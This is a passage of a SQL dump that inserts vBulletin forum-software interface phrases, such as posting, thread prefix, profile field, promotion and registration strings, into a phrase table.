''), (36945, -1, 'posting_message_please_wait', 'posting', 'Posting Message - Please Wait', 'vbulletin', 'vBulletin Solutions', 1144708590, '3.6.0 Beta 1'), (36946, -1, 'preview', 'posting', 'Preview', 'vbulletin', '', 0, ''), (36947, -1, 'preview_changes', 'posting', 'Preview Changes', 'vbulletin', '', 0, ''), (36948, -1, 'preview_message', 'posting', 'Preview Message', 'vbulletin', 'vBulletin Solutions', 1196728227, '3.7.0 Beta 1'), (36949, -1, 'preview_post', 'posting', 'Preview Post', 'vbulletin', '', 0, ''), (36950, -1, 'quick_reply', 'posting', 'Quick Reply', 'vbulletin', 'vBulletin Solutions', 1203089685, '3.7.0 Beta 6'), (36951, -1, 'reason_for_deletion', 'posting', 'Reason for Deletion', 'vbulletin', '', 0, ''), (36952, -1, 'reason_for_editing', 'posting', 'Reason for Editing', 'vbulletin', '', 0, ''), (36953, -1, 'redo', 'posting', 'Redo', 'vbulletin', '', 0, ''), (36954, -1, 'remove_link', 'posting', 'Remove Link', 'vbulletin', '', 0, ''), (36955, -1, 'remove_text_formatting', 'posting', 'Remove Text Formatting', 'vbulletin', '', 0, ''), (36956, -1, 'reopen_this_thread', 'posting', 'Re-open this thread after you submit your message', 'vbulletin', '', 0, ''), (36957, -1, 'reply_to_thread', 'posting', 'Reply to Thread', 'vbulletin', '', 0, ''), (36958, -1, 'reply_to_topic', 'posting', 'Reply to Topic', 'vbulletin', '', 0, ''), (36959, -1, 'reset_views_counter', 'posting', 'Reset Views Counter to Zero', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36960, -1, 'select_a_file_to_attach', 'posting', 'Please select a file to attach.', 'vbulletin', '', 0, ''), (36961, -1, 'selected_1_post_not_part_thread', 'posting', 'You have selected 1 post that is not part of this thread. Quote this post as well, or deselect this post.', 'vbulletin', 'vBulletin Solutions', 1148659367, '3.6.0 Beta 1'), (36962, -1, 'selected_x_posts_not_part_thread', 'posting', 'You have selected {1} posts that are not part of this thread. Quote these posts as well, or deselect these posts.', 'vbulletin', 'vBulletin Solutions', 1208426590, '3.7.0 Release Candidate 4'), (36963, -1, 'separate_tags_using_comma', 'posting', 'Separate tags using a comma.', 'vbulletin', 'vBulletin Solutions', 1190903991, '3.7.0 Beta 1'), (36964, -1, 'show_all_smilies', 'posting', 'Show all Smilies', 'vbulletin', '', 0, ''), (36965, -1, 'show_your_signature', 'posting', 'Show your signature', 'vbulletin', '', 0, ''), (36966, -1, 'sizes', 'posting', 'Sizes', 'vbulletin', '', 0, ''), (36967, -1, 'stick_this_thread', 'posting', 'Stick this thread after you submit your message', 'vbulletin', '', 0, ''), (36968, -1, 'stuck', 'posting', 'Stuck', 'vbulletin', '', 0, ''), (36969, -1, 'submit_message', 'posting', 'Submit Message', 'vbulletin', '', 0, ''), (36970, -1, 'submit_new_thread', 'posting', 'Submit New Thread', 'vbulletin', '', 0, ''), (36971, -1, 'submit_reply', 'posting', 'Submit Reply', 'vbulletin', '', 0, ''), (36972, -1, 'subtitle', 'posting', 'Subtitle', 'vbulletin', 'vBulletin Solutions', 1156883825, '3.6.1'), (36973, -1, 'switch_editor_mode', 'posting', 'Switch Editor Mode', 'vbulletin', '', 0, ''), (36974, -1, 'tag_management', 'posting', 'Tag Management', 'vbulletin', 'vBulletin Solutions', 1190904587, '3.7.0 Beta 1'), (36975, -1, 'tags_visible_all_users', 'posting', 'Tags will be visible to all users.', 'vbulletin', 'vBulletin Solutions', 1197975228, '3.7.0 Beta 3'), (36976, -1, 'terrible', 'posting', 'Terrible', 'vbulletin', '', 0, ''), (36977, -1, 'text_changes', 'posting', 'Text Changes', 'vbulletin', 'vBulletin Solutions', 1194539236, '3.7.0 Beta 1'), (36978, -1, 'this_forum_is_not_accepting_new_attachments', 'posting', 'This forum is not accepting new attachments', 'vbulletin', '', 0, ''), (36979, -1, 'this_user_on_your_ignore_list', 'posting', 'This user is on your Ignore List.', 'vbulletin', '', 0, ''), (36980, -1, 'thread_has_more_than_x_review', 'posting', 'This thread has more than {1} replies.\r\nClick here to review the whole thread.', 'vbulletin', '', 0, ''), (36981, -1, 'thread_management', 'posting', 'Thread Management', 'vbulletin', '', 0, ''), (36982, -1, 'thread_subscription', 'posting', 'Thread Subscription', 'vbulletin', '', 0, ''), (36983, -1, 'time_of_edit', 'posting', 'Time of Edit', 'vbulletin', 'vBulletin Solutions', 1191498409, '3.7.0 Beta 1'), (36984, -1, 'title_changes', 'posting', 'Title Changes', 'vbulletin', 'vBulletin Solutions', 1194539229, '3.7.0 Beta 1'), (36985, -1, 'topic_review_newest_first', 'posting', 'Topic Review (Newest First)', 'vbulletin', '', 0, ''), (36986, -1, 'uncheck_tag_remove_bold_you', 'posting', 'Uncheck a tag to remove it from this thread. Tags in bold were added by you.', 'vbulletin', 'vBulletin Solutions', 1196431681, '3.7.0 Beta 1'), (36987, -1, 'underline', 'posting', 'Underline', 'vbulletin', '', 0, ''), (36988, -1, 'undo', 'posting', 'Undo', 'vbulletin', '', 0, ''), (36989, -1, 'unordered_list', 'posting', 'Unordered List', 'vbulletin', '', 0, ''), (36990, -1, 'unstick_this_thread', 'posting', 'Un-stick this thread after you submit your message', 'vbulletin', '', 0, ''), (36991, -1, 'upload_file', 'posting', 'Upload File', 'vbulletin', '', 0, ''), (36992, -1, 'upload_file_from_url', 'posting', 'Upload File from a URL', 'vbulletin', 'vBulletin Solutions', 1150741358, '3.6.0 Beta 3'), (36993, -1, 'upload_file_from_your_computer', 'posting', 'Upload File from your Computer', 'vbulletin', '', 0, ''), (36994, -1, 'uploading_file', 'posting', 'Uploading File(s) - Please Wait', 'vbulletin', '', 0, ''), (36995, -1, 'wrap_code_tags', 'posting', 'Wrap [CODE] tags around selected text', 'vbulletin', '', 0, ''), (36996, -1, 'wrap_html_tags', 'posting', 'Wrap [HTML] tags around selected text', 'vbulletin', '', 0, ''), (36997, -1, 'wrap_php_tags', 'posting', 'Wrap [PHP] tags around selected text', 'vbulletin', '', 0, ''), (36998, -1, 'wrap_quote_tags', 'posting', 'Wrap [QUOTE] tags around selected text', 'vbulletin', '', 0, ''), (36999, -1, 'wrap_x_tags', 'posting', 'Wrap [{1}] tags around selected text', 'vbulletin', '', 0, ''), (37000, -1, 'wysiwyg_command_invalid', 'posting', 'This command is invalid or not implemented.', 'vbulletin', '', 0, ''), (37001, -1, 'wysiwyg_initialized', 'posting', 'WYSIWYG Editor initialized for {1} in {2} seconds.', 'vbulletin', '', 0, ''), (37002, -1, 'wysiwyg_please_wait', 'posting', 'Please wait for the WYSIWYG editor to finish loading...', 'vbulletin', '', 0, ''), (37003, -1, 'yes_post_a_poll_thread', 'posting', 'Yes, post a poll with this thread', 'vbulletin', '', 0, ''), (37004, -1, 'you_may_add_x_tags_to_thread', 'posting', 'You may add {1} tag(s) to this thread.', 'vbulletin', 'vBulletin Solutions', 1196431479, '3.7.0 Beta 1'), (37005, -1, 'any_prefix_meta', 'prefix', '(any prefix)', 'vbulletin', 'vBulletin Solutions', 1190041853, '3.7.0 Beta 1'), (37006, -1, 'no_prefix_meta', 'prefix', '(no prefix)', 'vbulletin', 'vBulletin Solutions', 1189609622, '3.7.0 Beta 1'), (37007, -1, 'prefix', 'prefix', 'Prefix', 'vbulletin', 'vBulletin Solutions', 1190041938, '3.7.0 Beta 1'), (37008, -1, 'add_prefix', 'prefixadmin', 'Add Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37009, -1, 'add_prefix_set', 'prefixadmin', 'Add Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37010, -1, 'adding_prefix', 'prefixadmin', 'Adding Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37011, -1, 'adding_prefix_set', 'prefixadmin', 'Adding Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37012, -1, 'allow_new_groups_to_use_selected_prefixes', 'prefixadmin', 'Allow Newly Created Usergroups To Use The Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891270, '3.8.0 Alpha 1'), (37013, -1, 'are_you_sure_want_to_delete_prefix_x', 'prefixadmin', 'Are you sure you want to delete the prefix called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190042495, '3.7.0 Beta 1'), (37014, -1, 'are_you_sure_want_to_delete_prefixset_x', 'prefixadmin', 'Are you sure you want to delete the prefix set called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190042502, '3.7.0 Beta 1'), (37015, -1, 'copy_permissions_from', 'prefixadmin', 'Copy Permissions From', 'vbulletin', 'vBulletin Solutions', 1213891295, '3.8.0 Alpha 1'), (37016, -1, 'copy_permissions_to', 'prefixadmin', 'Copy Permissions To', 'vbulletin', 'vBulletin Solutions', 1213891318, '3.8.0 Alpha 1'), (37017, -1, 'deny_permission_for_selected_prefixes', 'prefixadmin', 'Deny Permission For All Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891336, '3.8.0 Alpha 1'), (37018, -1, 'do_not_resolve_permission_conflict', 'prefixadmin', 'Do Not Resolve Permission Conflict', 'vbulletin', 'vBulletin Solutions', 1213891363, '3.8.0 Alpha 1'), (37019, -1, 'edit_selected_prefix_permissions', 'prefixadmin', 'Edit Selected Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1213891383, '3.8.0 Alpha 1'), (37020, -1, 'edit_thread_prefix_permissions', 'prefixadmin', 'Edit Thread Prefix Permissions', 'vbulletin', 'vBulletin Solutions', 1213891403, '3.8.0 Alpha 1'), (37021, -1, 'editing_permissions_for_x', 'prefixadmin', 'Editing permissions for {1}', 'vbulletin', 'vBulletin Solutions', 1213891423, '3.8.0 Alpha 1'), (37022, -1, 'editing_prefix', 'prefixadmin', 'Editing Prefix', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37023, -1, 'editing_prefix_set', 'prefixadmin', 'Editing Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37024, -1, 'grant_permission_for_selected_prefixes', 'prefixadmin', 'Grant Permission For All Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891443, '3.8.0 Alpha 1'), (37025, -1, 'leave_default_permissions_unchanged', 'prefixadmin', 'Leave Default Permissions Unchanged', 'vbulletin', 'vBulletin Solutions', 1213891464, '3.8.0 Alpha 1'), (37026, -1, 'new_groups_may_not_use_selected_prefixes', 'prefixadmin', 'New Groups May Not Use Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891479, '3.8.0 Alpha 1'), (37027, -1, 'new_groups_may_use_selected_prefixes', 'prefixadmin', 'New Groups May Use Selected Prefixes', 'vbulletin', 'vBulletin Solutions', 1213891503, '3.8.0 Alpha 1'), (37028, -1, 'no_prefix_sets_defined_click_create', 'prefixadmin', 'There are no prefix sets defined. To create a prefix, you must first create a prefix set. Click here to create a set!', 'vbulletin', 'vBulletin Solutions', 1190043266, '3.7.0 Beta 1'), (37029, -1, 'no_prefixes_defined_click_create', 'prefixadmin', 'No prefixes defined for this set. Click here to create a prefix!', 'vbulletin', 'vBulletin Solutions', 1190043266, '3.7.0 Beta 1'), (37030, -1, 'overwrite_customized_permissions_no_restrictions', 'prefixadmin', 'Overwrite Customized Permissions\r\nIf you select no, only target prefixes with no restrictions will be updated. Selecting yes will update all target prefixes.', 'vbulletin', 'vBulletin Solutions', 1216748324, '3.8.0 Alpha 1'), (37031, -1, 'prefix_id_alphanumeric_note', 'prefixadmin', 'Prefix ID\r\nA-Z, a-z, 0-9, and _ (underscore) only', 'vbulletin', 'vBulletin Solutions', 1210067235, '3.7.1'), (37032, -1, 'prefix_set', 'prefixadmin', 'Prefix Set', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37033, -1, 'prefix_set_id_alphanumeric_note', 'prefixadmin', 'Prefix Set ID\r\nA-Z, a-z, 0-9, and _ (underscore) only', 'vbulletin', 'vBulletin Solutions', 1210067249, '3.7.1'), (37034, -1, 'resolve_permission_conflict', 'prefixadmin', 'Resolve Permission Conflict', 'vbulletin', 'vBulletin Solutions', 1213891546, '3.8.0 Alpha 1'), (37035, -1, 'set_default_permissions', 'prefixadmin', 'Set Default Permissions', 'vbulletin', 'vBulletin Solutions', 1213891565, '3.8.0 Alpha 1'), (37036, -1, 'thread_prefix_manager', 'prefixadmin', 'Thread Prefix Manager', 'vbulletin', 'vBulletin Solutions', 1190042876, '3.7.0 Beta 1'), (37037, -1, 'thread_prefixes', 'prefixadmin', 'Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37038, -1, 'title_plain_text', 'prefixadmin', 'Title (Plain Text)', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37039, -1, 'title_rich_text', 'prefixadmin', 'Title (Rich Text)', 'vbulletin', 'vBulletin Solutions', 1190043041, '3.7.0 Beta 1'), (37040, -1, 'use_prefix_set_in_these_forums', 'prefixadmin', 'Use Prefix Set in These Forums', 'vbulletin', 'vBulletin Solutions', 1190047777, '3.7.0 Beta 1'), (37041, -1, 'add_new_option', 'profilefield', 'Add New Option', 'vbulletin', '', 0, ''), (37042, -1, 'add_new_profile_field_category', 'profilefield', 'Add New Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176909569, '3.6.6'), (37043, -1, 'add_new_user_profile_field', 'profilefield', 'Add New User Profile Field', 'vbulletin', '', 0, ''), (37044, -1, 'after_x', 'profilefield', 'After \'{1}\'', 'vbulletin', '', 0, ''), (37045, -1, 'allow_user_to_input_their_own_value_for_this_option', 'profilefield', 'Allow user to input their own value for this option', 'vbulletin', '', 0, ''), (37046, -1, 'are_you_sure_you_want_to_delete_this_user_profile_field', 'profilefield', 'Are you sure you want to delete this User Profile Field?', 'vbulletin', '', 0, ''), (37047, -1, 'are_you_sure_you_want_to_delete_user_profile_field_category_x', 'profilefield', 'Are you sure you want to delete this user profile field category?\r\n
\r\n {1}\r\n
(Contains {2} Profile Fields)
\r\n
\r\nAny profile fields belonging to this category will become {3} but will not be deleted.', 'vbulletin', 'vBulletin Solutions', 1176908567, '3.6.6'), (37048, -1, 'blocks_column_after_albums', 'profilefield', 'Blocks Column, After Albums', 'vbulletin', 'vBulletin Solutions', 1193677939, '3.7.0 Beta 1'), (37049, -1, 'blocks_column_after_mini_stats', 'profilefield', 'Blocks Column, After Mini Stats', 'vbulletin', 'vBulletin Solutions', 1193677923, '3.7.0 Beta 1'), (37050, -1, 'blocks_column_first', 'profilefield', 'Blocks Column, First', 'vbulletin', 'vBulletin Solutions', 1193677906, '3.7.0 Beta 1'), (37051, -1, 'blocks_column_last', 'profilefield', 'Blocks Column, Last', 'vbulletin', 'vBulletin Solutions', 1193677953, '3.7.0 Beta 1'), (37052, -1, 'box_height', 'profilefield', 'Box HeightNumber of options to display simultaneously. 0 will display them all.', 'vbulletin', '', 0, ''), (37053, -1, 'choose_limit_choices_add_info', 'profilefield', 'If you choose to limit the number of choices in the next option, please add that information to the description.', 'vbulletin', '', 0, ''), (37054, -1, 'contains_x_fields', 'profilefield', 'Contains {1} Fields', 'vbulletin', 'vBulletin Solutions', 1176908546, '3.6.6'), (37055, -1, 'default_value_you_may_specify_a_default_registration_value', 'profilefield', 'Default ValueYou may specify a default value that is entered into this field at the time of registration.', 'vbulletin', '', 0, ''), (37056, -1, 'display_page', 'profilefield', 'Display Page', 'vbulletin', '', 0, ''), (37057, -1, 'edit_user_profile_field_category', 'profilefield', 'Edit User Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176908531, '3.6.6'), (37058, -1, 'editable', 'profilefield', 'Editable', 'vbulletin', '', 0, ''), (37059, -1, 'field_editable_by_user', 'profilefield', 'Field Editable by User', 'vbulletin', '', 0, ''), (37060, -1, 'field_hidden_on_profile', 'profilefield', 'Private Field', 'vbulletin', '', 0, ''), (37061, -1, 'field_length', 'profilefield', 'Field Length', 'vbulletin', 'vBulletin Solutions', 1147797010, '3.6.0 Beta 1'), (37062, -1, 'field_searchable_on_members_list', 'profilefield', 'Field Searchable on Members List', 'vbulletin', '', 0, ''), (37063, -1, 'fields', 'profilefield', 'Fields', 'vbulletin', '', 0, ''), (37064, -1, 'fields_from_form_x', 'profilefield', 'Profile Fields from Form \'{1}\'', 'vbulletin', 'vBulletin Solutions', 1202827399, '3.7.0 Beta 5'), (37065, -1, 'hidden', 'profilefield', 'Hidden', 'vbulletin', '', 0, ''), (37066, -1, 'items_per_line', 'profilefield', 'Items Per LineInput 0 to display all of the controls on the same line.', 'vbulletin', 'vBulletin Solutions', 1199998605, '3.7.0 Beta 4'), (37067, -1, 'limit_selection', 'profilefield', 'Limit SelectionMaximum number of options the user may select. Enter 0 to allow them to choose all of the options.', 'vbulletin', '', 0, ''), (37068, -1, 'location_on_profile_page_dfn', 'profilefield', 'Location on Profile Page\r\nProfile fields will always be shown on the \'About Me\' tab, in addition to any location you select here.', 'vbulletin', 'vBulletin Solutions', 1193678008, '3.7.0 Beta 1'), (37069, -1, 'main_column_first_tab', 'profilefield', 'Main Column, First Tab', 'vbulletin', 'vBulletin Solutions', 1193677878, '3.7.0 Beta 1'), (37070, -1, 'main_column_last_tab', 'profilefield', 'Main Column, Last Tab', 'vbulletin', 'vBulletin Solutions', 1193677892, '3.7.0 Beta 1'), (37071, -1, 'messaging', 'profilefield', 'Messaging', 'vbulletin', '', 0, ''), (37072, -1, 'multiple_line_text_box', 'profilefield', 'Multiple-Line Text Box', 'vbulletin', '', 0, ''), (37073, -1, 'multiple_selection_checkbox', 'profilefield', 'Multiple-Selection Checkbox', 'vbulletin', '', 0, ''), (37074, -1, 'multiple_selection_menu', 'profilefield', 'Multiple-Selection Menu', 'vbulletin', '', 0, ''), (37075, -1, 'name', 'profilefield', 'Name', 'vbulletin', '', 0, ''), (37076, -1, 'no_but_on_register', 'profilefield', 'No, but display at registration', 'vbulletin', '', 0, ''); INSERT INTO `phrase` (`phraseid`, `languageid`, `varname`, `fieldname`, `text`, `product`, `username`, `dateline`, `version`) VALUES (37077, -1, 'no_user_profile_field_categories_have_been_created', 'profilefield', 'No user profile field categories have been created.
\r\n
\r\nClick the link below to create a new category.', 'vbulletin', 'vBulletin Solutions', 1176908658, '3.6.6'), (37078, -1, 'note_max_31_options', 'profilefield', 'Note: You may have a maximum of 31 options in this field.', 'vbulletin', 'vBulletin Solutions', 1204733531, '3.7.0 Beta 6'), (37079, -1, 'only_at_registration', 'profilefield', 'Only at registration', 'vbulletin', '', 0, ''), (37080, -1, 'only_in_about_me_tab', 'profilefield', 'Only in the \'About Me\' Tab', 'vbulletin', 'vBulletin Solutions', 1193677848, '3.7.0 Beta 1'), (37081, -1, 'optional_input', 'profilefield', 'Optional Input', 'vbulletin', '', 0, ''), (37082, -1, 'other', 'profilefield', 'Other', 'vbulletin', '', 0, ''), (37083, -1, 'other_please_specify', 'profilefield', 'Other (please specify)', 'vbulletin', '', 0, ''), (37084, -1, 'postition', 'profilefield', 'Position', 'vbulletin', '', 0, ''), (37085, -1, 'privacy', 'profilefield', 'Privacy', 'vbulletin', '', 0, ''), (37086, -1, 'profile_field_category', 'profilefield', 'Profile Field Category', 'vbulletin', 'vBulletin Solutions', 1176908600, '3.6.6'), (37087, -1, 'profile_field_type', 'profilefield', 'Profile Field Type', 'vbulletin', '', 0, ''), (37088, -1, 'regular_expression_require_match', 'profilefield', 'Regular ExpressionYou may require the input field to match a regular expression (PCRE).', 'vbulletin', 'vBulletin Solutions', 1190377582, '3.7.0 Beta 1'), (37089, -1, 'rename', 'profilefield', 'Rename', 'vbulletin', '', 0, ''), (37090, -1, 'required', 'profilefield', 'Required', 'vbulletin', '', 0, ''), (37091, -1, 'searchable', 'profilefield', 'Searchable', 'vbulletin', '', 0, ''), (37092, -1, 'set_default_if_yes_first', 'profilefield', 'Set Default Will set the first non blank option as the default.', 'vbulletin', 'vBulletin Solutions', 1157746464, '3.6.1'), (37093, -1, 'show_on_members_list', 'profilefield', 'Show on Members List', 'vbulletin', '', 0, ''), (37094, -1, 'single_line_text_box', 'profilefield', 'Single-Line Text Box', 'vbulletin', '', 0, ''), (37095, -1, 'single_selection_menu', 'profilefield', 'Single-Selection Menu', 'vbulletin', '', 0, ''), (37096, -1, 'single_selection_radio_buttons', 'profilefield', 'Single-Selection Radio Buttons', 'vbulletin', '', 0, ''), (37097, -1, 'text_area_height', 'profilefield', 'Text Area Height', 'vbulletin', '', 0, ''), (37098, -1, 'this_profile_fields_no_options', 'profilefield', 'This user profile field has no options.', 'vbulletin', '', 0, ''), (37099, -1, 'thread_viewing', 'profilefield', 'Thread Viewing', 'vbulletin', '', 0, ''), (37100, -1, 'uncategorized', 'profilefield', 'Uncategorized', 'vbulletin', 'vBulletin Solutions', 1176908208, '3.6.6'), (37101, -1, 'user_profile_field_categories', 'profilefield', 'User Profile Field Categories', 'vbulletin', 'vBulletin Solutions', 1176908614, '3.6.6'), (37102, -1, 'user_profile_field_manager', 'profilefield', 'User Profile Field Manager', 'vbulletin', '', 0, ''), (37103, -1, 'user_profile_fields_in_area_x', 'profilefield', 'User Profile Fields in Area: {1}', 'vbulletin', '', 0, ''), (37104, -1, 'which_page_displays_option', 'profilefield', 'Which page displays this option?If you select \"Edit Your Details\", this option will show up when viewing a user\'s profile. All other options are primarily used in conjunction with template conditionals to create additional options for your users.', 'vbulletin', 'vBulletin Solutions', 1201688546, '3.7.0 Beta 5'), (37105, -1, 'yes_always', 'profilefield', 'Yes, Always', 'vbulletin', 'vBulletin Solutions', 1147712780, '3.6.0 Beta 1'), (37106, -1, 'yes_at_registration', 'profilefield', 'Yes, at registration and profile updating', 'vbulletin', 'vBulletin Solutions', 1147712757, '3.6.0 Beta 1'), (37107, -1, 'yes_but_no_blank_option', 'profilefield', 'Yes, but No First Blank Option', 'vbulletin', '', 0, ''), (37108, -1, 'yes_including_a_blank', 'profilefield', 'Yes, Including a First Blank Option', 'vbulletin', '', 0, ''), (37109, -1, 'you_close_before_modifying_checkboxes', 'profilefield', 'You should close your forum before modifying checkbox fields.', 'vbulletin', '', 0, ''), (37110, -1, 'add_new_promotion', 'promotion', 'Add New Promotion', 'vbulletin', '', 0, ''), (37111, -1, 'edit_promotions', 'promotion', 'Edit Promotions', 'vbulletin', '', 0, ''), (37112, -1, 'greater_or_equal_to', 'promotion', 'Greater or Equal to', 'vbulletin', '', 0, ''), (37113, -1, 'less_than', 'promotion', 'Less Than', 'vbulletin', '', 0, ''), (37114, -1, 'move_user_to_usergroup', 'promotion', 'Move User to Usergroup', 'vbulletin', '', 0, ''), (37115, -1, 'move_user_to_usergroup_description', 'promotion', 'Jumping is evaluated based on the time period defined in the Scheduled Tasks section (Default: Every 1 Hour)', 'vbulletin', '', 0, ''), (37116, -1, 'promotion_strategy', 'promotion', 'Promotion Strategy', 'vbulletin', '', 0, ''), (37117, -1, 'promotion_strategy1', 'promotion', 'Posts and Reputation and Date', 'vbulletin', '', 0, ''), (37118, -1, 'promotion_strategy2', 'promotion', 'Posts or Reputation or Date', 'vbulletin', '', 0, ''), (37119, -1, 'promotion_strategy3', 'promotion', '(Posts and Reputation) or Date', 'vbulletin', '', 0, ''), (37120, -1, 'promotion_strategy4', 'promotion', 'Posts and (Reputation or Date)', 'vbulletin', '', 0, ''), (37121, -1, 'promotion_strategy5', 'promotion', '(Posts or Reputation) and Date', 'vbulletin', '', 0, ''), (37122, -1, 'promotion_strategy6', 'promotion', 'Posts or (Reputation and Date)', 'vbulletin', '', 0, ''), (37123, -1, 'promotion_strategy7', 'promotion', 'Reputation and (Posts or Date)', 'vbulletin', '', 0, ''), (37124, -1, 'promotion_strategy8', 'promotion', 'Reputation or (Posts and Date)', 'vbulletin', '', 0, ''), (37125, -1, 'promotion_strategy_description', 'promotion', 'Choose the way that you wish the above values to be evaluated', 'vbulletin', '', 0, ''), (37126, -1, 'promotion_type', 'promotion', 'Promotion Type', 'vbulletin', '', 0, ''), (37127, -1, 'promotion_type_description_primary_additional', 'promotion', 'Type of promotion that the user is to receive. Select \'Primary Usergroup\' to change the user\'s main usergroup to this group or select \'Additional Usergroups\' to add this group to the user\'s additional usergroups', 'vbulletin', '', 0, ''), (37128, -1, 'reputation_comparison_type', 'promotion', 'Reputation Comparison Type', 'vbulletin', '', 0, ''), (37129, -1, 'reputation_comparison_type_desc', 'promotion', 'This option only applies to reputation and only when reputation has been selected as part of the Promotion Strategy above.', 'vbulletin', 'vBulletin Solutions', 1199738300, '3.7.0 Beta 4'), (37130, -1, 'additional_required_information_option', 'register', 'Additional Required Information (option)', 'vbulletin', '', 0, ''), (37131, -1, 'additional_required_information_profile', 'register', 'Additional Required Information (profile)', 'vbulletin', '', 0, ''), (37132, -1, 'complete_registration', 'register', 'Complete Registration', 'vbulletin', '', 0, ''), (37133, -1, 'confirm_email_address', 'register', 'Confirm Email Address', 'vbulletin', '', 0, ''), (37134, -1, 'confirm_password', 'register', 'Confirm Password', 'vbulletin', '', 0, ''), (37135, -1, 'contact_webmaster_questions', 'register', 'Please contact the webmaster with any questions', 'vbulletin', '', 0, ''), (37136, -1, 'coppa', 'register', 'COPPA', 'vbulletin', '', 0, ''), (37137, -1, 'coppa_policy', 'register', 'COPPA Policy', 'vbulletin', '', 0, ''), (37138, -1, 'coppa_rules', 'register', 'COPPA Rules', 'vbulletin', '', 0, ''), (37139, -1, 'coppa_rules_description', 'register', '

All users under the age of 13 must seek permission from their parent or guardian\r\nin order to gain membership of the {1} forums.\r\nWhile we welcome participation from members under 13,\r\nwe require that a parent or guardian fax or mail back a signed permission form before we grant membership.

\r\n\r\n

If you would like to start the registration process prior to us receiving a permission form,\r\ncheck the \'I agree\' checkbox and press the \'Register\' button below. If you would like to cancel the registration,\r\nclick here to return to the forums index.

\r\n\r\n

A copy of the permission form can be downloaded here.

\r\n\r\n

For more information about the registration process, or the {1} forums in general,\r\nplease send email to {4}.

', 'vbulletin', '', 0, ''), (37140, -1, 'enter_valid_email_address', 'register', 'Please enter a valid email address for yourself.', 'vbulletin', '', 0, ''), (37141, -1, 'entered_passwords_do_not_match', 'register', 'The entered passwords do not match.', 'vbulletin', '', 0, ''), (37142, -1, 'errors_occurred_during_registration', 'register', 'The following errors occurred during your registration', 'vbulletin', '', 0, ''), (37143, -1, 'fill_out_both_password_fields', 'register', 'Please fill out both password fields.', 'vbulletin', '', 0, ''), (37144, -1, 'forum_rules', 'register', 'Forum Rules', 'vbulletin', '', 0, ''), (37145, -1, 'forum_rules_description', 'register', '

Although the administrators and moderators of {2} will attempt to keep all objectionable\r\nmessages off this forum, it is impossible for us to review all messages. All messages express the views of\r\nthe author, and neither the owners of {2}, nor vBulletin Solutions, Inc. (developers of vBulletin)\r\nwill be held responsible for the content of any message.

\r\n\r\n

By agreeing to these rules, you warrant that you will not post any messages that are obscene, vulgar,\r\nsexually-oriented, hateful, threatening, or otherwise violative of any laws.

\r\n\r\n

The owners of {2} reserve the right to remove, edit, move or close any thread for any reason.

', 'vbulletin', 'vBulletin Solutions', 1220350279, '3.8.0 Alpha 1'), (37146, -1, 'forum_rules_registration', 'register', '

Forum Rules

\r\n\r\n

Registration to this forum is free! We do insist that you abide by the rules and policies detailed\r\nbelow. If you agree to the terms, please check the \'I agree\' checkbox and press the \'Register\' button below.\r\nIf you would like to cancel the registration, click here\r\nto return to the forums index.

', 'vbulletin', 'vBulletin Solutions', 1220350261, '3.8.0 Alpha 1'), (37147, -1, 'if_referred_enter_name', 'register', 'If you were referred to this site by an existing member of {1}, enter their username here.', 'vbulletin', 'vBulletin Solutions', 1207929495, '3.7.0 Release Candidate 4'), (37148, -1, 'instructions_for_parent_guardian', 'register', 'Instructions for a Parent or Guardian

\r\n Please print out this page, sign it and fax it to:
\r\n {1} at {2}

\r\n Or mail it to:
\r\n {3}

\r\n If approval is not received in 7 days the information will be deleted.', 'vbulletin', '', 0, ''), (37149, -1, 'make_changes_profile_visit', 'register', 'To make changes to the profile information below, please visit this page and enter the username and password', 'vbulletin', '', 0, ''), (37150, -1, 'optional_information', 'register', 'Optional Information', 'vbulletin', '', 0, ''), (37151, -1, 'parent_guardian_full_name', 'register', 'Parent / Guardian Full Name', 'vbulletin', '', 0, ''), (37152, -1, 'parent_signature', 'register', 'Signature', 'vbulletin', 'vBulletin Solutions', 1198786806, '3.7.0 Beta 4'), (37153, -1, 'parental_permission_required', 'register', 'Parental Permission Required', 'vbulletin', 'vBulletin Solutions', 1198786784, '3.7.0 Beta 4'), (37154, -1, 'permission_to_participate_at_x', 'register', 'Permission to Participate at
{1}', 'vbulletin', '', 0, ''), (37155, -1, 'please_enter_a_proper_year', 'register', 'Please enter a proper year', 'vbulletin', '', 0, ''), (37156, -1, 'please_enter_your_date_of_birth', 'register', 'Please Enter Your Date of Birth', 'vbulletin', '', 0, ''), (37157, -1, 'privacy_mode', 'register', 'Privacy Mode', 'vbulletin', '', 0, ''), (37158, -1, 'read_agree_abide_by_rules', 'register', 'I have read, and agree to abide by the {1} rules.', 'vbulletin', '', 0, ''), (37159, -1, 'register_at_x', 'register', 'Register at {1}', 'vbulletin', '', 0, ''), (37160, -1, 'registration', 'register', 'Registration', 'vbulletin', '', 0, ''), (37161, -1, 'registration_image', 'register', 'Registration Image', 'vbulletin', '', 0, ''), (37162, -1, 'relation_to_child', 'register', 'Relation to Child', 'vbulletin', '', 0, ''), (37163, -1, 'required_information', 'register', 'Required Information', 'vbulletin', '', 0, ''), (37164, -1, 'select_a_day', 'register', 'Select a day', 'vbulletin', 'vBulletin Solutions', 1144883336, '3.6.0 Beta 1'), (37165, -1, 